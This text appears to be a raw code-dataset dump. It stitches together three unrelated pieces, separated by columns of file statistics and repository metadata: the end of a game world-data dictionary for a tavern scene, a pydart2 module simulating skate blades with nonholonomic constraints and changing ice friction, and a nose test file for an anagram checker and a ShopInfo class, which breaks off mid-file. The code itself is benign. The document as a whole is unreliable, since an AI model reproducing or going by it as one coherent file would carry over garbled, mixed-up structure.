'None', 'Respawns': True, 'Scale': VBase3(0.943, 0.943, 0.943), 'ShopID': 'PORT_ROYAL_DEFAULTS', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'Villager', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'Zombie': False, 'spawnTimeAlt': '', 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1208545146.78akelts': {'Type': 'Townsperson', 'Category': 'Commoner', 'AnimSet': 'bar_talk03', 'AuraFX': 'None', 'Boss': False, 'CustomModel': 'None', 'GhostColor': 'None', 'GhostFX': 0, 'Greeting Animation': '', 'Hpr': VBase3(-143.742, 0.0, 0.0), 'Instanced World': 'None', 'Level': '37', 'Notice Animation 1': '', 'Notice Animation 2': '', 'Patrol Radius': '12.0000', 'Pos': Point3(-45.371, -5.222, 1.0), 'PoseAnim': '', 'PoseFrame': '', 'Private Status': 'All', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Respawns': 
True, 'Scale': VBase3(0.99, 0.99, 0.99), 'ShopID': 'PORT_ROYAL_DEFAULTS', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'Villager', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'Zombie': False, 'spawnTimeAlt': '', 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1208546953.92akelts': {'Type': 'Townsperson', 'Category': 'Commoner', 'AnimSet': 'idleC', 'AuraFX': 'None', 'Boss': False, 'CustomModel': 'None', 'GhostColor': 'None', 'GhostFX': 0, 'Greeting Animation': '', 'Hpr': VBase3(74.008, 0.0, 0.0), 'Instanced World': 'None', 'Level': '37', 'Notice Animation 1': '', 'Notice Animation 2': '', 'Patrol Radius': '12.0000', 'Pos': Point3(18.561, -3.343, 1.0), 'PoseAnim': '', 'PoseFrame': '', 'Private Status': 'All', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Respawns': True, 'Scale': VBase3(1.0, 1.0, 1.0), 'ShopID': 'PORT_ROYAL_DEFAULTS', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'Villager', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'Zombie': False, 'spawnTimeAlt': '', 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1208550439.95akelts': {'Type': 'Cups', 'DisableCollision': False, 'Hpr': VBase3(-120.43, 0.0, 0.0), 'Pos': Point3(-47.074, -7.149, 4.608), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0), 'Model': 'models/props/beerstein'}}, '1209147627.03akelts': {'Type': 'Parlor Game', 'Category': 'Blackjack', 'BetMultiplier': '1', 'GameVariation': 'Normal', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-8.524, 2.247, 1.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/table_bar_round_parlor'}}}, 'Visual': {'Model': 'models/buildings/interior_tavern_b'}}}, 'Node Links': [], 'Layers': {'Collisions': ['1184008208.59kmuller', '1184016064.62kmuller', '1184013852.84kmuller', '1185822696.06kmuller', '1184006140.32kmuller', '1184002350.98kmuller', '1184007573.29kmuller', '1184021176.59kmuller', 
'1184005963.59kmuller', '1188324241.31akelts', '1184006537.34kmuller', '1184006605.81kmuller', '1187139568.33kmuller', '1188324186.98akelts', '1184006730.66kmuller', '1184007538.51kmuller', '1184006188.41kmuller', '1184021084.27kmuller', '1185824396.94kmuller', '1185824250.16kmuller', '1185823630.52kmuller', '1185823760.23kmuller', '1185824497.83kmuller', '1185824751.45kmuller', '1187739103.34akelts', '1188323993.34akelts', '1184016538.29kmuller', '1185822200.97kmuller', '1184016225.99kmuller', '1195241421.34akelts', '1195242796.08akelts', '1184020642.13kmuller', '1195237994.63akelts', '1184020756.88kmuller', '1184020833.4kmuller', '1185820992.97kmuller', '1185821053.83kmuller', '1184015068.54kmuller', '1184014935.82kmuller', '1185821432.88kmuller', '1185821701.86kmuller', '1195240137.55akelts', '1195241539.38akelts', '1195238422.3akelts', '1195238473.22akelts', '1185821453.17kmuller', '1184021269.96kmuller', '1185821310.89kmuller', '1185821165.59kmuller', '1185821199.36kmuller', '1185822035.98kmuller', '1184015806.59kmuller', '1185822059.48kmuller', '1185920461.76kmuller', '1194984449.66akelts', '1185824206.22kmuller', '1184003446.23kmuller', '1184003254.85kmuller', '1184003218.74kmuller', '1184002700.44kmuller', '1186705073.11kmuller', '1187658531.86akelts', '1186705214.3kmuller', '1185824927.28kmuller', '1184014204.54kmuller', '1184014152.84kmuller']}, 'ObjectIds': {'1202846053.19akelts0': '["Objects"]["1202846053.19akelts0"]', '1204236104.67akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1204236104.67akelts"]', '1204236104.69akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1204236104.69akelts"]', '1208543385.0akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208543385.0akelts"]', '1208543583.91akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208543583.91akelts"]', '1208544322.67akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208544322.67akelts"]', '1208544716.73akelts': 
'["Objects"]["1202846053.19akelts0"]["Objects"]["1208544716.73akelts"]', '1208545146.78akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208545146.78akelts"]', '1208546953.92akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208546953.92akelts"]', '1208550439.95akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208550439.95akelts"]', '1209147627.03akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1209147627.03akelts"]'}}
extraInfo = {'camPos': Point3(96.3424, -205.988, 41.641), 'camHpr': VBase3(26.9442, -19.9935, 0), 'focalLength': 1.39999997616, 'skyState': -1, 'fog': 0}
| 1,262.857143
| 8,387
| 0.668778
| 1,028
| 8,840
| 5.723735
| 0.342412
| 0.014956
| 0.012237
| 0.009517
| 0.472128
| 0.43015
| 0.414004
| 0.397689
| 0.386812
| 0.378994
| 0
| 0.230864
| 0.08224
| 8,840
| 7
| 8,388
| 1,262.857143
| 0.494392
| 0.026131
| 0
| 0
| 0
| 0
| 0.617316
| 0.098431
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e597d7d5e596662f7668cab5715f6ef068ef8e5c
| 17,489
|
py
|
Python
|
SkateUtils/NonHolonomicWorld.py
|
snumrl/skate
|
a57ec2dc81dc2502da8886b92b870d2c8d65b838
|
[
"Apache-2.0"
] | null | null | null |
SkateUtils/NonHolonomicWorld.py
|
snumrl/skate
|
a57ec2dc81dc2502da8886b92b870d2c8d65b838
|
[
"Apache-2.0"
] | null | null | null |
SkateUtils/NonHolonomicWorld.py
|
snumrl/skate
|
a57ec2dc81dc2502da8886b92b870d2c8d65b838
|
[
"Apache-2.0"
] | null | null | null |
import pydart2 as pydart
import numpy as np
import math
from PyCommon.modules.Math import mmMath as mm
class NHWorld(pydart.World):
    """pydart2 world that attaches nonholonomic contact constraints to the
    left/right skate-blade bodies of skeleton 1, restricting each blade's
    ground contact to slide along its front-to-rear axis while it is near the
    ground.
    """

    def __init__(self, step, skel_path=None, xmlstr=False):
        # Guard so reset() is safe even before the constraints exist.
        self.has_nh = False
        super(NHWorld, self).__init__(step, skel_path, xmlstr)
        # nonholonomic constraint initial setting
        _th = 5. * math.pi / 180.  # violation-angle ignore threshold (5 degrees)
        skel = self.skeletons[1]
        # Skeleton 0 is presumably the ground — TODO confirm; its friction is lowered.
        self.skeletons[0].body(0).set_friction_coeff(0.02)
        # Front (nh0/nh2) and rear (nh1/nh3) contact points on the right and
        # left blades; offsets are expressed in each blade body's local frame.
        self.nh0 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_right'), np.array((0.0216+0.104, -0.0216-0.027, 0.)))
        self.nh1 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_right'), np.array((0.0216-0.104, -0.0216-0.027, 0.)))
        self.nh2 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_left'), np.array((0.0216+0.104, -0.0216-0.027, 0.)))
        self.nh3 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_left'), np.array((0.0216-0.104, -0.0216-0.027, 0.)))
        # Only the rear constraints get violation-ignore settings; 0.208 is
        # the front-to-rear contact spacing (2 * 0.104).
        self.nh1.set_violation_angle_ignore_threshold(_th)
        self.nh1.set_length_for_violation_ignore(0.208)
        self.nh3.set_violation_angle_ignore_threshold(_th)
        self.nh3.set_length_for_violation_ignore(0.208)
        self.nh0.add_to_world()
        self.nh1.add_to_world()
        self.nh2.add_to_world()
        self.nh3.add_to_world()
        self.has_nh = True
        self.ground_height = 0.

    def reset(self):
        """Reset the world, then re-apply friction and re-register constraints."""
        super(NHWorld, self).reset()
        self.skeletons[0].body(0).set_friction_coeff(0.02)
        if self.has_nh:
            self.nh0.add_to_world()
            self.nh1.add_to_world()
            self.nh2.add_to_world()
            self.nh3.add_to_world()

    def step(self):
        """Activate each blade's constraints only while both of its contact
        points are within 0.005 of the ground height, then advance the world."""
        # nonholonomic constraint
        right_blade_front_point = self.skeletons[1].body("h_blade_right").to_world((0.0216+0.104, -0.0216-0.027, 0.))
        right_blade_rear_point = self.skeletons[1].body("h_blade_right").to_world((0.0216-0.104, -0.0216-0.027, 0.))
        # Index [1] is the vertical (height) coordinate of the world position.
        if right_blade_front_point[1] < 0.005+self.ground_height and right_blade_rear_point[1] < 0.005+self.ground_height:
            self.nh0.activate(True)
            self.nh1.activate(True)
            # Constrain both contacts to slide along the front-to-rear axis.
            self.nh0.set_joint_pos(right_blade_front_point)
            self.nh0.set_projected_vector(right_blade_front_point - right_blade_rear_point)
            self.nh1.set_joint_pos(right_blade_rear_point)
            self.nh1.set_projected_vector(right_blade_front_point - right_blade_rear_point)
        else:
            self.nh0.activate(False)
            self.nh1.activate(False)
        left_blade_front_point = self.skeletons[1].body("h_blade_left").to_world((0.0216+0.104, -0.0216-0.027, 0.))
        left_blade_rear_point = self.skeletons[1].body("h_blade_left").to_world((0.0216-0.104, -0.0216-0.027, 0.))
        if left_blade_front_point[1] < 0.005 +self.ground_height and left_blade_rear_point[1] < 0.005+self.ground_height:
            self.nh2.activate(True)
            self.nh3.activate(True)
            self.nh2.set_joint_pos(left_blade_front_point)
            self.nh2.set_projected_vector(left_blade_front_point - left_blade_rear_point)
            self.nh3.set_joint_pos(left_blade_rear_point)
            self.nh3.set_projected_vector(left_blade_front_point - left_blade_rear_point)
        else:
            self.nh2.activate(False)
            self.nh3.activate(False)
        super(NHWorld, self).step()
class NHWorldV2(pydart.World):
    """Skating world with nonholonomic blade constraints (V2).

    Each skate blade (left/right) is modelled by two
    ``NonHolonomicContactConstraint`` objects pinned at the blade's front
    and rear points.  While both points are near the ground the
    constraints are activated so the blade can only slide along its own
    direction.  The constrained direction is additionally rotated about
    the vertical axis by a turning angle derived from the blade's lean
    (inclination) angle.
    """

    # Blade end points in body-local coordinates (front / rear / origin).
    _FRONT_OFFSET = (0.0216 + 0.104, -0.0216 - 0.027, 0.)
    _REAR_OFFSET = (0.0216 - 0.104, -0.0216 - 0.027, 0.)
    _ORIGIN_OFFSET = (0., -0.0216 - 0.027, 0.)
    # A blade point whose height is within this of the ground counts as contact.
    _CONTACT_THRESHOLD = 0.005

    def __init__(self, step, skel_path=None, xmlstr=False):
        # Guard so reset() is safe even if called before constraints exist.
        self.has_nh = False
        super(NHWorldV2, self).__init__(step, skel_path, xmlstr)
        # nonholonomic constraint initial setting
        skel = self.skeletons[1]
        # Low friction coefficient models the slippery ice surface.
        self.skeletons[0].body(0).set_friction_coeff(0.02)
        self.nh0 = pydart.constraints.NonHolonomicContactConstraint(
            skel.body('h_blade_right'), np.array(self._FRONT_OFFSET))
        self.nh1 = pydart.constraints.NonHolonomicContactConstraint(
            skel.body('h_blade_right'), np.array(self._REAR_OFFSET))
        self.nh2 = pydart.constraints.NonHolonomicContactConstraint(
            skel.body('h_blade_left'), np.array(self._FRONT_OFFSET))
        self.nh3 = pydart.constraints.NonHolonomicContactConstraint(
            skel.body('h_blade_left'), np.array(self._REAR_OFFSET))
        self.nh0.add_to_world()
        self.nh1.add_to_world()
        self.nh2.add_to_world()
        self.nh3.add_to_world()
        self.has_nh = True
        self.ground_height = 0.

    def reset(self):
        """Reset the world, restore ice friction and re-register constraints."""
        super(NHWorldV2, self).reset()
        self.skeletons[0].body(0).set_friction_coeff(0.02)
        if self.has_nh:
            for nh in (self.nh0, self.nh1, self.nh2, self.nh3):
                nh.add_to_world()

    def _blade_points(self, body_name):
        """Return the world-space (front, rear) points of the given blade body."""
        body = self.skeletons[1].body(body_name)
        return body.to_world(self._FRONT_OFFSET), body.to_world(self._REAR_OFFSET)

    def _update_blade_constraints(self, body_name, nh_front, nh_rear):
        """Activate/deactivate and update one blade's pair of constraints.

        The constraints are active only while both blade end points are
        in ground contact; the constrained sliding direction is the
        front-to-rear blade axis rotated by the lean-derived turning angle.
        """
        front, rear = self._blade_points(body_name)
        threshold = self._CONTACT_THRESHOLD + self.ground_height
        if front[1] < threshold and rear[1] < threshold:
            nh_front.activate(True)
            nh_rear.activate(True)
            body = self.skeletons[1].body(body_name)
            body_pos = body.to_world(self._ORIGIN_OFFSET)
            body_vec = body.to_world() - body_pos  # type: np.ndarray
            projected_body_vec = body_vec.copy()
            projected_body_vec[1] = 0.
            projected_body_vel = body.world_linear_velocity()
            projected_body_vel[1] = 0.
            # Lean (inclination) of the blade relative to the ground plane.
            inclined_angle = math.pi / 2. - math.acos(
                np.dot(mm.normalize(body_vec), mm.normalize(projected_body_vec)))
            # Turn only when leaning more than 15 degrees; the sign follows
            # the lateral component of the blade velocity.
            turning_angle = np.copysign(
                max(inclined_angle - 15. / 180. * math.pi, 0.) / 4.,
                np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
            R = mm.exp(mm.unitY(), turning_angle)
            nh_front.set_joint_pos(np.dot(R, front - body_pos) + body_pos)
            nh_rear.set_joint_pos(np.dot(R, rear - body_pos) + body_pos)
            nh_front.set_projected_vector(np.dot(R, front - rear))
            nh_rear.set_projected_vector(np.dot(R, front - rear))
        else:
            nh_front.activate(False)
            nh_rear.activate(False)

    def step(self):
        """Update both blades' nonholonomic constraints, then step physics."""
        self._update_blade_constraints('h_blade_right', self.nh0, self.nh1)
        self._update_blade_constraints('h_blade_left', self.nh2, self.nh3)
        super(NHWorldV2, self).step()
class NHWorldV3(pydart.World):
    """Skating world with nonholonomic blade constraints (V3).

    Same blade-constraint model as NHWorldV2, with one addition: when the
    right blade's front point digs into the ground while its rear point is
    lifted (a toe-pick contact), the ground friction coefficient is raised
    so the pick grips instead of sliding.
    """

    # Blade end points in body-local coordinates (front / rear / origin).
    _FRONT_OFFSET = (0.0216 + 0.104, -0.0216 - 0.027, 0.)
    _REAR_OFFSET = (0.0216 - 0.104, -0.0216 - 0.027, 0.)
    _ORIGIN_OFFSET = (0., -0.0216 - 0.027, 0.)
    # A blade point whose height is within this of the ground counts as contact.
    _CONTACT_THRESHOLD = 0.005
    # Rear point must be at least this high for a toe-pick contact.
    _TOE_PICK_REAR_HEIGHT = 0.05

    def __init__(self, step, skel_path=None, xmlstr=False):
        # Guard so reset() is safe even if called before constraints exist.
        self.has_nh = False
        super(NHWorldV3, self).__init__(step, skel_path, xmlstr)
        # nonholonomic constraint initial setting
        skel = self.skeletons[1]
        # Low friction coefficient models the slippery ice surface.
        self.skeletons[0].body(0).set_friction_coeff(0.02)
        self.nh0 = pydart.constraints.NonHolonomicContactConstraint(
            skel.body('h_blade_right'), np.array(self._FRONT_OFFSET))
        self.nh1 = pydart.constraints.NonHolonomicContactConstraint(
            skel.body('h_blade_right'), np.array(self._REAR_OFFSET))
        self.nh2 = pydart.constraints.NonHolonomicContactConstraint(
            skel.body('h_blade_left'), np.array(self._FRONT_OFFSET))
        self.nh3 = pydart.constraints.NonHolonomicContactConstraint(
            skel.body('h_blade_left'), np.array(self._REAR_OFFSET))
        self.nh0.add_to_world()
        self.nh1.add_to_world()
        self.nh2.add_to_world()
        self.nh3.add_to_world()
        self.has_nh = True
        self.ground_height = 0.

    def reset(self):
        """Reset the world, restore ice friction and re-register constraints."""
        super(NHWorldV3, self).reset()
        self.skeletons[0].body(0).set_friction_coeff(0.02)
        if self.has_nh:
            for nh in (self.nh0, self.nh1, self.nh2, self.nh3):
                nh.add_to_world()

    def _blade_points(self, body_name):
        """Return the world-space (front, rear) points of the given blade body."""
        body = self.skeletons[1].body(body_name)
        return body.to_world(self._FRONT_OFFSET), body.to_world(self._REAR_OFFSET)

    def _update_blade_constraints(self, body_name, nh_front, nh_rear):
        """Activate/deactivate and update one blade's pair of constraints.

        The constraints are active only while both blade end points are
        in ground contact; the constrained sliding direction is the
        front-to-rear blade axis rotated by the lean-derived turning angle.
        """
        front, rear = self._blade_points(body_name)
        threshold = self._CONTACT_THRESHOLD + self.ground_height
        if front[1] < threshold and rear[1] < threshold:
            nh_front.activate(True)
            nh_rear.activate(True)
            body = self.skeletons[1].body(body_name)
            body_pos = body.to_world(self._ORIGIN_OFFSET)
            body_vec = body.to_world() - body_pos  # type: np.ndarray
            projected_body_vec = body_vec.copy()
            projected_body_vec[1] = 0.
            projected_body_vel = body.world_linear_velocity()
            projected_body_vel[1] = 0.
            # Lean (inclination) of the blade relative to the ground plane.
            inclined_angle = math.pi / 2. - math.acos(
                np.dot(mm.normalize(body_vec), mm.normalize(projected_body_vec)))
            # Turn only when leaning more than 15 degrees; the sign follows
            # the lateral component of the blade velocity.
            turning_angle = np.copysign(
                max(inclined_angle - 15. / 180. * math.pi, 0.) / 4.,
                np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
            R = mm.exp(mm.unitY(), turning_angle)
            nh_front.set_joint_pos(np.dot(R, front - body_pos) + body_pos)
            nh_rear.set_joint_pos(np.dot(R, rear - body_pos) + body_pos)
            nh_front.set_projected_vector(np.dot(R, front - rear))
            nh_rear.set_projected_vector(np.dot(R, front - rear))
        else:
            nh_front.activate(False)
            nh_rear.activate(False)

    def step(self):
        """Apply toe-pick friction, update blade constraints, step physics."""
        right_front, right_rear = self._blade_points('h_blade_right')
        # Toe-pick contact (right blade only): front point touches while the
        # rear is clearly lifted -> raise friction so the pick grips;
        # otherwise keep the ice slippery.
        if (right_front[1] < self._CONTACT_THRESHOLD + self.ground_height
                and right_rear[1] > self._TOE_PICK_REAR_HEIGHT + self.ground_height):
            self.skeletons[0].body(0).set_friction_coeff(1.0)
        else:
            self.skeletons[0].body(0).set_friction_coeff(0.02)
        self._update_blade_constraints('h_blade_right', self.nh0, self.nh1)
        self._update_blade_constraints('h_blade_left', self.nh2, self.nh3)
        super(NHWorldV3, self).step()
| 52.20597
| 154
| 0.629882
| 2,540
| 17,489
| 4.061024
| 0.050787
| 0.071837
| 0.030247
| 0.052351
| 0.975085
| 0.964905
| 0.964905
| 0.957538
| 0.951139
| 0.946195
| 0
| 0.067306
| 0.230316
| 17,489
| 334
| 155
| 52.362275
| 0.698982
| 0.2039
| 0
| 0.844221
| 0
| 0
| 0.0325
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045226
| false
| 0
| 0.020101
| 0
| 0.080402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5b157c8d462330b646be148fe7ff940241a84cd
| 4,001
|
py
|
Python
|
tests/sweep_builder/expectation_builder/expectations_inventory/metrics/test_breakdowns.py
|
panoramichq/data-collection-fb
|
550b90a303c880ae8c3dfd2801dc4f991a969f89
|
[
"MIT"
] | null | null | null |
tests/sweep_builder/expectation_builder/expectations_inventory/metrics/test_breakdowns.py
|
panoramichq/data-collection-fb
|
550b90a303c880ae8c3dfd2801dc4f991a969f89
|
[
"MIT"
] | null | null | null |
tests/sweep_builder/expectation_builder/expectations_inventory/metrics/test_breakdowns.py
|
panoramichq/data-collection-fb
|
550b90a303c880ae8c3dfd2801dc4f991a969f89
|
[
"MIT"
] | null | null | null |
from datetime import datetime, date
from unittest.mock import patch
from common.enums.entity import Entity
from common.enums.reporttype import ReportType
from common.job_signature import JobSignature
from sweep_builder.data_containers.entity_node import EntityNode
from sweep_builder.data_containers.expectation_claim import ExpectationClaim
from sweep_builder.data_containers.reality_claim import RealityClaim
from sweep_builder.expectation_builder.expectations_inventory.metrics.breakdowns import (
day_metrics_per_ads_under_ad_account,
)
@patch('sweep_builder.expectation_builder.expectations_inventory.metrics.breakdowns.iter_reality_per_ad_account_claim')
def test_day_metrics_per_entity_under_ad_account_not_divisible(mock_iter_reality_per_ad_account):
    """Non-divisible claims produce one account-level expectation per covered day."""
    reality_claim = RealityClaim(
        ad_account_id='ad-account-id',
        entity_id='ad-account-id',
        entity_type=Entity.AdAccount,
        timezone='America/Los_Angeles',
    )
    mock_iter_reality_per_ad_account.return_value = [
        RealityClaim(
            entity_type=Entity.Ad,
            campaign_id='campaign-1',
            adset_id='adset-1',
            entity_id='ad-1',
            bol=datetime(2019, 1, 1, 12, 0),
            eol=datetime(2019, 1, 2, 12, 0),
        ),
        RealityClaim(
            entity_type=Entity.Ad,
            entity_id='ad-2',
            bol=datetime(2019, 1, 3, 12, 0),
            eol=datetime(2019, 1, 3, 12, 0),
        ),
    ]

    result = list(day_metrics_per_ads_under_ad_account([ReportType.day], reality_claim))

    # One expectation claim per day 2019-01-01 .. 2019-01-03.
    expected = [
        ExpectationClaim(
            'ad-account-id',
            Entity.AdAccount,
            ReportType.day,
            Entity.Ad,
            JobSignature(f'fb|ad-account-id|||day|A|2019-01-0{day}'),
            ad_account_id='ad-account-id',
            timezone='America/Los_Angeles',
            range_start=date(2019, 1, day),
        )
        for day in (1, 2, 3)
    ]
    assert result == expected
@patch('sweep_builder.expectation_builder.expectations_inventory.metrics.breakdowns.iter_reality_per_ad_account_claim')
def test_day_metrics_per_entity_under_ad_account_is_divisible(mock_iter_reality_per_ad_account):
    """A divisible claim carries its entity hierarchy on the expectation."""
    account_claim = RealityClaim(
        ad_account_id='ad-account-id',
        entity_id='ad-account-id',
        entity_type=Entity.AdAccount,
        timezone='America/Los_Angeles',
    )
    ad_claim = RealityClaim(
        entity_type=Entity.Ad,
        campaign_id='campaign-1',
        adset_id='adset-1',
        entity_id='ad-1',
        bol=datetime(2019, 1, 1, 12, 0),
        eol=datetime(2019, 1, 1, 12, 0),
    )
    mock_iter_reality_per_ad_account.return_value = [ad_claim]

    result = list(day_metrics_per_ads_under_ad_account([ReportType.day], account_claim))

    # campaign-1 -> adset-1 hierarchy under the ad account.
    hierarchy = EntityNode(
        'ad-account-id',
        Entity.AdAccount,
        children=[EntityNode('campaign-1', Entity.Campaign, children=[EntityNode('adset-1', Entity.AdSet)])],
    )
    assert result == [
        ExpectationClaim(
            'ad-account-id',
            Entity.AdAccount,
            ReportType.day,
            Entity.Ad,
            JobSignature('fb|ad-account-id|||day|A|2019-01-01'),
            ad_account_id='ad-account-id',
            timezone='America/Los_Angeles',
            range_start=date(2019, 1, 1),
            entity_hierarchy=hierarchy,
        )
    ]
| 35.40708
| 119
| 0.627843
| 475
| 4,001
| 5.018947
| 0.151579
| 0.128356
| 0.106124
| 0.064178
| 0.830117
| 0.768876
| 0.754195
| 0.741611
| 0.713087
| 0.713087
| 0
| 0.040298
| 0.261935
| 4,001
| 112
| 120
| 35.723214
| 0.767017
| 0
| 0
| 0.70297
| 0
| 0
| 0.175956
| 0.089478
| 0
| 0
| 0
| 0
| 0.019802
| 1
| 0.019802
| false
| 0
| 0.089109
| 0
| 0.108911
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5b1895f6975d1d01b286298676175c4eb266b92
| 11,708
|
py
|
Python
|
homework/Write Few Python Programs/test_impl_with_nose.py
|
rvprasad/software-testing-course
|
3803851dcf9f7bbd0f0b89fca6c9c5e3a48f22e0
|
[
"CC-BY-4.0"
] | 11
|
2018-02-08T05:23:28.000Z
|
2021-05-24T13:23:56.000Z
|
homework/Write Few Python Programs/test_impl_with_nose.py
|
rvprasad/software-testing-course
|
3803851dcf9f7bbd0f0b89fca6c9c5e3a48f22e0
|
[
"CC-BY-4.0"
] | null | null | null |
homework/Write Few Python Programs/test_impl_with_nose.py
|
rvprasad/software-testing-course
|
3803851dcf9f7bbd0f0b89fca6c9c5e3a48f22e0
|
[
"CC-BY-4.0"
] | 2
|
2020-09-15T08:51:22.000Z
|
2021-01-26T12:07:18.000Z
|
import impl
import nose
def test_anagram_check_success():
    """Pairs that are anagrams (ignoring case and spaces) are accepted."""
    anagram_pairs = [
        ('Madam Curie', 'Radium came'),
        ('Who came', 'How mace'),
        ('his malt', 'salt him'),
        ('god', 'dog'),
        ('evil', 'live'),
        ('mace', 'came'),
        ('who ever', 'however'),
    ]
    for first, second in anagram_pairs:
        nose.tools.assert_true(impl.anagram_check(first, second))
def test_anagram_check_for_invalid_words():
    """Pairs that are not valid anagrams of real words are rejected."""
    rejected_pairs = [
        ('collapse', 'lapsecol'),
        ('collapse', 'laps cole'),
        ('karaoke singing', 'ring soaking kae'),
        ('life time', 'meet fili'),
        ('fall', 'llaf'),  # ??
    ]
    for first, second in rejected_pairs:
        nose.tools.assert_false(impl.anagram_check(first, second))
def test_anagram_check_not_permutation():
    """Words whose letters are not exact permutations are rejected."""
    non_permutations = (
        ('really', 'leary'),
        ('collapse', 'elapsed'),
        ('life time', 'meet file'),
    )
    for first, second in non_permutations:
        nose.tools.assert_false(impl.anagram_check(first, second))
def _assert_anagram_rejects(first, second):
    """Pass when anagram_check either raises ValueError or returns falsy."""
    raised = False
    returned_falsy = False
    try:
        returned_falsy = not impl.anagram_check(first, second)
    except ValueError:  # What can go wrong without specific exception type?
        raised = True
    nose.tools.assert_true(raised or returned_falsy)


def test_anagram_for_None1():
    _assert_anagram_rejects(None, '')


def test_anagram_for_None2():
    _assert_anagram_rejects('', None)


def test_anagram_for_None3():
    _assert_anagram_rejects(None, None)


def test_anagram_for_invalid_type1():
    _assert_anagram_rejects(1234, '')


def test_anagram_for_invalid_type2():
    _assert_anagram_rejects('', 1234)


def test_anagram_for_invalid_type3():
    _assert_anagram_rejects(1234, 1234)
# Shared valid fixture values used by the ShopInfo tests below.
NAME = "Harry"
PHONE = 7855326350
EMAIL = "harry@ksu.edu"
# The original file assigned URL three times ("http://ksu.edu/~harry",
# "http://www.microsoft.com/~harry", then "http://127.1.1.0"); only the
# last assignment ever took effect, so the dead assignments are removed
# and the effective value is kept.
URL = "http://127.1.1.0"
def test_shopinfo_for_all_valid1():
    """All four fields valid: every getter returns what was passed in."""
    info = impl.ShopInfo(NAME, PHONE, EMAIL, URL)
    nose.tools.assert_equal(info.get_name(), NAME)
    nose.tools.assert_equal(info.get_phone(), PHONE)
    nose.tools.assert_equal(info.get_email(), EMAIL)
    assert info.get_website() == URL  # Using assert


def test_shopinfo_for_all_valid2():
    """A dotted e-mail address is also accepted."""
    email = "john.doe@example.com"
    info = impl.ShopInfo(NAME, PHONE, email, URL)
    nose.tools.assert_equal(info.get_name(), NAME)
    nose.tools.assert_equal(info.get_phone(), PHONE)
    nose.tools.assert_equal(info.get_email(), email)
    nose.tools.assert_equal(info.get_website(), URL)


def test_shopinfo_for_all_valid3():
    """An IP-address URL with a path is also accepted."""
    url = "http://1.2.3.4/what/"
    info = impl.ShopInfo(NAME, PHONE, EMAIL, url)
    nose.tools.assert_equal(info.get_name(), NAME)
    nose.tools.assert_equal(info.get_phone(), PHONE)
    nose.tools.assert_equal(info.get_email(), EMAIL)
    nose.tools.assert_equal(info.get_website(), url)
def _assert_invalid_name(bad_name):
    """get_name raises ValueError; the other getters still return their values."""
    info = impl.ShopInfo(bad_name, PHONE, EMAIL, URL)
    nose.tools.assert_raises(ValueError, info.get_name)
    nose.tools.assert_equal(info.get_phone(), PHONE)
    nose.tools.assert_equal(info.get_email(), EMAIL)
    nose.tools.assert_equal(info.get_website(), URL)


def test_shopinfo_name_for_invalid_value1():
    _assert_invalid_name("1234")


def test_shopinfo_name_for_invalid_value2():
    _assert_invalid_name("")


def test_shopinfo_name_for_invalid_value3():
    _assert_invalid_name(None)


def test_shopinfo_name_for_invalid_value4():
    _assert_invalid_name("Seven-11")


def test_shopinfo_name_for_invalid_type():
    _assert_invalid_name(1234)
def _assert_invalid_phone(bad_phone):
    """get_phone raises ValueError; the other getters still return their values."""
    info = impl.ShopInfo(NAME, bad_phone, EMAIL, URL)
    nose.tools.assert_equal(info.get_name(), NAME)
    nose.tools.assert_raises(ValueError, info.get_phone)
    nose.tools.assert_equal(info.get_email(), EMAIL)
    nose.tools.assert_equal(info.get_website(), URL)


